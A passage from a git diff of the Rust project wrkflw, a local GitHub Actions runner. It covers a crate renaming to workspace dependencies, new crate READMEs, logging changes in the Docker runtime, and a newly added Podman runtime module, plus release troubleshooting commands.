- Use `cargo tree` to verify dependency resolution
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Common Issues
|
||||
|
||||
**Issue**: Cargo complains about version mismatches
|
||||
```bash
|
||||
# Solution: Check workspace dependencies match crate versions
|
||||
grep -r "version.*=" crates/*/Cargo.toml
|
||||
grep "wrkflw-.*version" Cargo.toml
|
||||
```
|
||||
|
||||
**Issue**: Published crate can't find dependencies
|
||||
```bash
|
||||
# Solution: Ensure all dependencies are published to crates.io first
|
||||
# Or use path dependencies only for local development
|
||||
```
|
||||
|
||||
**Issue**: GitHub Actions fails on tag
|
||||
```bash
|
||||
# Solution: Ensure tag format matches workflow trigger
|
||||
git tag -d v1.2.3 # Delete local tag
|
||||
git push origin :refs/tags/v1.2.3 # Delete remote tag
|
||||
git tag v1.2.3 # Recreate with correct format
|
||||
git push origin v1.2.3
|
||||
```
|
||||
|
||||
## Tools and Commands
|
||||
|
||||
### Useful Commands
|
||||
|
||||
```bash
|
||||
# List all workspace members with versions
|
||||
cargo ws list
|
||||
|
||||
# Check all crates
|
||||
cargo check --workspace
|
||||
|
||||
# Test all crates
|
||||
cargo test --workspace
|
||||
|
||||
# Show dependency tree
|
||||
cargo tree
|
||||
|
||||
# Show outdated dependencies
|
||||
cargo outdated
|
||||
|
||||
# Verify publishability
|
||||
cargo publish --dry-run --manifest-path crates/models/Cargo.toml
|
||||
```
|
||||
|
||||
### Recommended Tools
|
||||
|
||||
- `cargo-workspaces`: Workspace management
|
||||
- `cargo-outdated`: Check for outdated dependencies
|
||||
- `cargo-audit`: Security audit
|
||||
- `cargo-machete`: Find unused dependencies
|
||||
|
||||
## Migration Notes
|
||||
|
||||
If you're migrating from the old hard-coded version system:
|
||||
|
||||
1. All internal crate versions are now managed in workspace `Cargo.toml`
|
||||
2. Individual crates use `crate-name.workspace = true` for internal dependencies
|
||||
3. Use the helper script or manual process above for individual versioning
|
||||
4. The system is fully backward compatible with existing workflows
|
||||
12
clippy-test.yml
Normal file
12
clippy-test.yml
Normal file
@@ -0,0 +1,12 @@
|
||||
name: Clippy Test
|
||||
on: [push]
|
||||
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Test secrets after clippy fixes
|
||||
env:
|
||||
TEST_VAR: ${{ secrets.TEST_SECRET }}
|
||||
run: |
|
||||
echo "Secret length: ${#TEST_VAR}"
|
||||
@@ -1,15 +1,20 @@
|
||||
[package]
|
||||
name = "evaluator"
|
||||
name = "wrkflw-evaluator"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow evaluation for wrkflw"
|
||||
description = "Workflow evaluation functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
validators = { path = "../validators" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-validators.workspace = true
|
||||
|
||||
# External dependencies
|
||||
colored.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
|
||||
29
crates/evaluator/README.md
Normal file
29
crates/evaluator/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-evaluator
|
||||
|
||||
Small, focused helper for statically evaluating GitHub Actions workflow files.
|
||||
|
||||
- **Purpose**: Fast structural checks (e.g., `name`, `on`, `jobs`) before deeper validation/execution
|
||||
- **Used by**: `wrkflw` CLI and TUI during validation flows
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
|
||||
let result = wrkflw_evaluator::evaluate_workflow_file(
|
||||
Path::new(".github/workflows/ci.yml"),
|
||||
/* verbose */ true,
|
||||
).expect("evaluation failed");
|
||||
|
||||
if result.is_valid {
|
||||
println!("Workflow looks structurally sound");
|
||||
} else {
|
||||
for issue in result.issues {
|
||||
println!("- {}", issue);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Notes
|
||||
- This crate focuses on structural checks; deeper rules live in `wrkflw-validators`.
|
||||
- Most consumers should prefer the top-level `wrkflw` CLI for end-to-end UX.
|
||||
@@ -3,8 +3,8 @@ use serde_yaml::{self, Value};
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
use models::ValidationResult;
|
||||
use validators::{validate_jobs, validate_triggers};
|
||||
use wrkflw_models::ValidationResult;
|
||||
use wrkflw_validators::{validate_jobs, validate_triggers};
|
||||
|
||||
pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationResult, String> {
|
||||
let content = fs::read_to_string(path).map_err(|e| format!("Failed to read file: {}", e))?;
|
||||
@@ -21,26 +21,9 @@ pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationRe
|
||||
return Ok(result);
|
||||
}
|
||||
|
||||
// Check if name exists
|
||||
if workflow.get("name").is_none() {
|
||||
// Check if this might be a reusable workflow caller before reporting missing name
|
||||
let has_reusable_workflow_job = if let Some(Value::Mapping(jobs)) = workflow.get("jobs") {
|
||||
jobs.values().any(|job| {
|
||||
if let Some(job_config) = job.as_mapping() {
|
||||
job_config.contains_key(Value::String("uses".to_string()))
|
||||
} else {
|
||||
false
|
||||
}
|
||||
})
|
||||
} else {
|
||||
false
|
||||
};
|
||||
|
||||
// Only report missing name if it's not a workflow with reusable workflow jobs
|
||||
if !has_reusable_workflow_job {
|
||||
result.add_issue("Workflow is missing a name".to_string());
|
||||
}
|
||||
}
|
||||
// Note: The 'name' field is optional per GitHub Actions specification.
|
||||
// When omitted, GitHub displays the workflow file path relative to the repository root.
|
||||
// We do not validate name presence as it's not required by the schema.
|
||||
|
||||
// Check if jobs section exists
|
||||
match workflow.get("jobs") {
|
||||
|
||||
@@ -1,18 +1,24 @@
|
||||
[package]
|
||||
name = "executor"
|
||||
name = "wrkflw-executor"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow executor for wrkflw"
|
||||
description = "Workflow execution engine for wrkflw"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
parser = { path = "../parser" }
|
||||
runtime = { path = "../runtime" }
|
||||
logging = { path = "../logging" }
|
||||
matrix = { path = "../matrix" }
|
||||
utils = { path = "../utils" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-parser.workspace = true
|
||||
wrkflw-runtime.workspace = true
|
||||
wrkflw-logging.workspace = true
|
||||
wrkflw-matrix.workspace = true
|
||||
wrkflw-secrets.workspace = true
|
||||
wrkflw-utils.workspace = true
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
@@ -21,6 +27,7 @@ chrono.workspace = true
|
||||
dirs.workspace = true
|
||||
futures.workspace = true
|
||||
futures-util.workspace = true
|
||||
ignore = "0.4"
|
||||
lazy_static.workspace = true
|
||||
num_cpus.workspace = true
|
||||
once_cell.workspace = true
|
||||
|
||||
29
crates/executor/README.md
Normal file
29
crates/executor/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-executor
|
||||
|
||||
The execution engine that runs GitHub Actions workflows locally (Docker, Podman, or emulation).
|
||||
|
||||
- **Features**:
|
||||
- Job graph execution with `needs` ordering and parallelism
|
||||
- Docker/Podman container steps and emulation mode
|
||||
- Basic environment/context wiring compatible with Actions
|
||||
- **Used by**: `wrkflw` CLI and TUI
|
||||
|
||||
### API sketch
|
||||
|
||||
```rust
|
||||
use wrkflw_executor::{execute_workflow, ExecutionConfig, RuntimeType};
|
||||
|
||||
let cfg = ExecutionConfig {
|
||||
runtime: RuntimeType::Docker,
|
||||
verbose: true,
|
||||
preserve_containers_on_failure: false,
|
||||
};
|
||||
|
||||
// Path to a workflow YAML
|
||||
let workflow_path = std::path::Path::new(".github/workflows/ci.yml");
|
||||
|
||||
let result = execute_workflow(workflow_path, cfg).await?;
|
||||
println!("workflow status: {:?}", result.summary_status);
|
||||
```
|
||||
|
||||
Prefer using the `wrkflw` binary for a complete UX across validation, execution, and logs.
|
||||
@@ -1,5 +1,5 @@
|
||||
use parser::workflow::WorkflowDefinition;
|
||||
use std::collections::{HashMap, HashSet};
|
||||
use wrkflw_parser::workflow::WorkflowDefinition;
|
||||
|
||||
pub fn resolve_dependencies(workflow: &WorkflowDefinition) -> Result<Vec<Vec<String>>, String> {
|
||||
let jobs = &workflow.jobs;
|
||||
|
||||
@@ -6,14 +6,14 @@ use bollard::{
|
||||
Docker,
|
||||
};
|
||||
use futures_util::StreamExt;
|
||||
use logging;
|
||||
use once_cell::sync::Lazy;
|
||||
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::sync::Mutex;
|
||||
use utils;
|
||||
use utils::fd;
|
||||
use wrkflw_logging;
|
||||
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use wrkflw_utils;
|
||||
use wrkflw_utils::fd;
|
||||
|
||||
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
static CREATED_NETWORKS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -50,7 +50,7 @@ impl DockerRuntime {
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
@@ -62,7 +62,7 @@ impl DockerRuntime {
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -72,7 +72,7 @@ impl DockerRuntime {
|
||||
let image_keys = match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(keys) => keys,
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
return None;
|
||||
}
|
||||
};
|
||||
@@ -107,7 +107,7 @@ impl DockerRuntime {
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
@@ -134,7 +134,7 @@ impl DockerRuntime {
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -318,7 +318,7 @@ pub fn is_available() -> bool {
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker CLI is not available");
|
||||
wrkflw_logging::debug("Docker CLI is not available");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
@@ -331,7 +331,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(rt) => rt,
|
||||
Err(e) => {
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"Failed to create runtime for Docker availability check: {}",
|
||||
e
|
||||
));
|
||||
@@ -352,17 +352,25 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(Ok(_)) => true,
|
||||
Ok(Err(e)) => {
|
||||
logging::debug(&format!("Docker daemon ping failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon ping failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker daemon ping timed out after 1 second");
|
||||
wrkflw_logging::debug(
|
||||
"Docker daemon ping timed out after 1 second",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
logging::debug(&format!("Docker daemon connection failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon connection failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -371,7 +379,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Docker availability check timed out");
|
||||
wrkflw_logging::debug("Docker availability check timed out");
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -379,7 +387,9 @@ pub fn is_available() -> bool {
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Failed to redirect stderr when checking Docker availability");
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -393,7 +403,7 @@ pub fn is_available() -> bool {
|
||||
return match handle.join() {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning("Docker availability check thread panicked");
|
||||
wrkflw_logging::warning("Docker availability check thread panicked");
|
||||
false
|
||||
}
|
||||
};
|
||||
@@ -401,7 +411,9 @@ pub fn is_available() -> bool {
|
||||
std::thread::sleep(std::time::Duration::from_millis(50));
|
||||
}
|
||||
|
||||
logging::warning("Docker availability check timed out, assuming Docker is not available");
|
||||
wrkflw_logging::warning(
|
||||
"Docker availability check timed out, assuming Docker is not available",
|
||||
);
|
||||
false
|
||||
}
|
||||
|
||||
@@ -444,19 +456,19 @@ pub async fn cleanup_resources(docker: &Docker) {
|
||||
tokio::join!(cleanup_containers(docker), cleanup_networks(docker));
|
||||
|
||||
if let Err(e) = container_result {
|
||||
logging::error(&format!("Error during container cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
|
||||
}
|
||||
|
||||
if let Err(e) = network_result {
|
||||
logging::error(&format!("Error during network cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during network cleanup: {}", e));
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out, some resources may not have been removed")
|
||||
}
|
||||
Ok(_) => wrkflw_logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Docker cleanup timed out, some resources may not have been removed",
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
@@ -468,7 +480,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
match RUNNING_CONTAINERS.try_lock() {
|
||||
Ok(containers) => containers.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire container lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire container lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -477,7 +489,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(containers) => containers,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get containers for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -486,7 +498,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} containers",
|
||||
containers_to_cleanup.len()
|
||||
));
|
||||
@@ -500,11 +512,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error stopping container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Then try to remove it
|
||||
@@ -514,11 +529,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error removing container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error removing container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
|
||||
@@ -536,7 +554,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
match CREATED_NETWORKS.try_lock() {
|
||||
Ok(networks) => networks.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire network lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire network lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -545,7 +563,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(networks) => networks,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get networks for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get networks for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -554,7 +572,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} networks",
|
||||
networks_to_cleanup.len()
|
||||
));
|
||||
@@ -566,9 +584,13 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::info(&format!("Successfully removed network: {}", network_id)),
|
||||
Ok(Err(e)) => logging::error(&format!("Error removing network {}: {}", network_id, e)),
|
||||
Err(_) => logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
Ok(Ok(_)) => {
|
||||
wrkflw_logging::info(&format!("Successfully removed network: {}", network_id))
|
||||
}
|
||||
Ok(Err(e)) => {
|
||||
wrkflw_logging::error(&format!("Error removing network {}: {}", network_id, e))
|
||||
}
|
||||
Err(_) => wrkflw_logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
}
|
||||
|
||||
// Always untrack the network whether or not we succeeded
|
||||
@@ -599,7 +621,7 @@ pub async fn create_job_network(docker: &Docker) -> Result<String, ContainerErro
|
||||
})?;
|
||||
|
||||
track_network(&network_id);
|
||||
logging::info(&format!("Created Docker network: {}", network_id));
|
||||
wrkflw_logging::info(&format!("Created Docker network: {}", network_id));
|
||||
|
||||
Ok(network_id)
|
||||
}
|
||||
@@ -615,7 +637,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// Print detailed debugging info
|
||||
logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
wrkflw_logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
|
||||
// Add a global timeout for all Docker operations to prevent freezing
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // Increased outer timeout to 6 minutes
|
||||
@@ -629,7 +651,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::error("Docker operation timed out after 360 seconds");
|
||||
wrkflw_logging::error("Docker operation timed out after 360 seconds");
|
||||
Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
@@ -644,7 +666,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning(&format!(
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Pull of image {} timed out, continuing with existing image",
|
||||
image
|
||||
));
|
||||
@@ -662,7 +684,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"Building image {} timed out after 120 seconds",
|
||||
tag
|
||||
));
|
||||
@@ -818,6 +840,14 @@ impl DockerRuntime {
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// First, try to pull the image if it's not available locally
|
||||
if let Err(e) = self.pull_image_inner(image).await {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Failed to pull image {}: {}. Attempting to continue with existing image.",
|
||||
image, e
|
||||
));
|
||||
}
|
||||
|
||||
// Collect environment variables
|
||||
let mut env: Vec<String> = env_vars
|
||||
.iter()
|
||||
@@ -836,9 +866,9 @@ impl DockerRuntime {
|
||||
// Convert command vector to Vec<String>
|
||||
let cmd_vec: Vec<String> = cmd.iter().map(|&s| s.to_string()).collect();
|
||||
|
||||
logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
|
||||
logging::debug(&format!("Environment: {:?}", env));
|
||||
logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
|
||||
wrkflw_logging::debug(&format!("Environment: {:?}", env));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
|
||||
// Determine platform-specific configurations
|
||||
let is_windows_image = image.contains("windows")
|
||||
@@ -973,7 +1003,7 @@ impl DockerRuntime {
|
||||
_ => -1,
|
||||
},
|
||||
Err(_) => {
|
||||
logging::warning("Container wait operation timed out, treating as failure");
|
||||
wrkflw_logging::warning("Container wait operation timed out, treating as failure");
|
||||
-1
|
||||
}
|
||||
};
|
||||
@@ -1003,7 +1033,7 @@ impl DockerRuntime {
|
||||
}
|
||||
}
|
||||
} else {
|
||||
logging::warning("Retrieving container logs timed out");
|
||||
wrkflw_logging::warning("Retrieving container logs timed out");
|
||||
}
|
||||
|
||||
// Clean up container with a timeout, but preserve on failure if configured
|
||||
@@ -1016,7 +1046,7 @@ impl DockerRuntime {
|
||||
untrack_container(&container.id);
|
||||
} else {
|
||||
// Container failed and we want to preserve it for debugging
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Preserving container {} for debugging (exit code: {}). Use 'docker exec -it {} bash' to inspect.",
|
||||
container.id, exit_code, container.id
|
||||
));
|
||||
@@ -1026,13 +1056,13 @@ impl DockerRuntime {
|
||||
|
||||
// Log detailed information about the command execution for debugging
|
||||
if exit_code != 0 {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Docker command failed with exit code: {}",
|
||||
exit_code
|
||||
));
|
||||
logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
logging::debug(&format!("STDERR: {}", stderr));
|
||||
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("STDERR: {}", stderr));
|
||||
}
|
||||
|
||||
Ok(ContainerOutput {
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,8 +1,8 @@
|
||||
use chrono::Utc;
|
||||
use matrix::MatrixCombination;
|
||||
use parser::workflow::WorkflowDefinition;
|
||||
use serde_yaml::Value;
|
||||
use std::{collections::HashMap, fs, io, path::Path};
|
||||
use wrkflw_matrix::MatrixCombination;
|
||||
use wrkflw_parser::workflow::WorkflowDefinition;
|
||||
|
||||
pub fn setup_github_environment_files(workspace_dir: &Path) -> io::Result<()> {
|
||||
// Create necessary directories
|
||||
|
||||
@@ -6,6 +6,7 @@ pub mod dependency;
|
||||
pub mod docker;
|
||||
pub mod engine;
|
||||
pub mod environment;
|
||||
pub mod podman;
|
||||
pub mod substitution;
|
||||
|
||||
// Re-export public items
|
||||
|
||||
877
crates/executor/src/podman.rs
Normal file
877
crates/executor/src/podman.rs
Normal file
@@ -0,0 +1,877 @@
|
||||
use async_trait::async_trait;
|
||||
use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::process::Stdio;
|
||||
use std::sync::Mutex;
|
||||
use tempfile;
|
||||
use tokio::process::Command;
|
||||
use wrkflw_logging;
|
||||
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use wrkflw_utils;
|
||||
use wrkflw_utils::fd;
|
||||
|
||||
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
// Map to track customized images for a job
|
||||
#[allow(dead_code)]
|
||||
static CUSTOMIZED_IMAGES: Lazy<Mutex<HashMap<String, String>>> =
|
||||
Lazy::new(|| Mutex::new(HashMap::new()));
|
||||
|
||||
pub struct PodmanRuntime {
|
||||
preserve_containers_on_failure: bool,
|
||||
}
|
||||
|
||||
impl PodmanRuntime {
|
||||
pub fn new() -> Result<Self, ContainerError> {
|
||||
Self::new_with_config(false)
|
||||
}
|
||||
|
||||
pub fn new_with_config(preserve_containers_on_failure: bool) -> Result<Self, ContainerError> {
|
||||
// Check if podman command is available
|
||||
if !is_available() {
|
||||
return Err(ContainerError::ContainerStart(
|
||||
"Podman is not available on this system".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
Ok(PodmanRuntime {
|
||||
preserve_containers_on_failure,
|
||||
})
|
||||
}
|
||||
|
||||
// Add a method to store and retrieve customized images (e.g., with Python installed)
|
||||
#[allow(dead_code)]
|
||||
pub fn get_customized_image(base_image: &str, customization: &str) -> Option<String> {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
pub fn set_customized_image(base_image: &str, customization: &str, new_image: &str) {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Find a customized image key by prefix
|
||||
#[allow(dead_code)]
|
||||
pub fn find_customized_image_key(image: &str, prefix: &str) -> Option<String> {
|
||||
let image_keys = match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(keys) => keys,
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
return None;
|
||||
}
|
||||
};
|
||||
|
||||
// Look for any key that starts with the prefix
|
||||
for (key, _) in image_keys.iter() {
|
||||
if key.starts_with(prefix) {
|
||||
return Some(key.clone());
|
||||
}
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
/// Get a customized image with language-specific dependencies
|
||||
pub fn get_language_specific_image(
|
||||
base_image: &str,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
) -> Option<String> {
|
||||
let key = match (language, version) {
|
||||
("python", Some(ver)) => format!("python:{}", ver),
|
||||
("node", Some(ver)) => format!("node:{}", ver),
|
||||
("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
|
||||
("go", Some(ver)) => format!("golang:{}", ver),
|
||||
("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
|
||||
("rust", Some(ver)) => format!("rust:{}", ver),
|
||||
(lang, Some(ver)) => format!("{}:{}", lang, ver),
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Set a customized image with language-specific dependencies
|
||||
pub fn set_language_specific_image(
|
||||
base_image: &str,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
new_image: &str,
|
||||
) {
|
||||
let key = match (language, version) {
|
||||
("python", Some(ver)) => format!("python:{}", ver),
|
||||
("node", Some(ver)) => format!("node:{}", ver),
|
||||
("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
|
||||
("go", Some(ver)) => format!("golang:{}", ver),
|
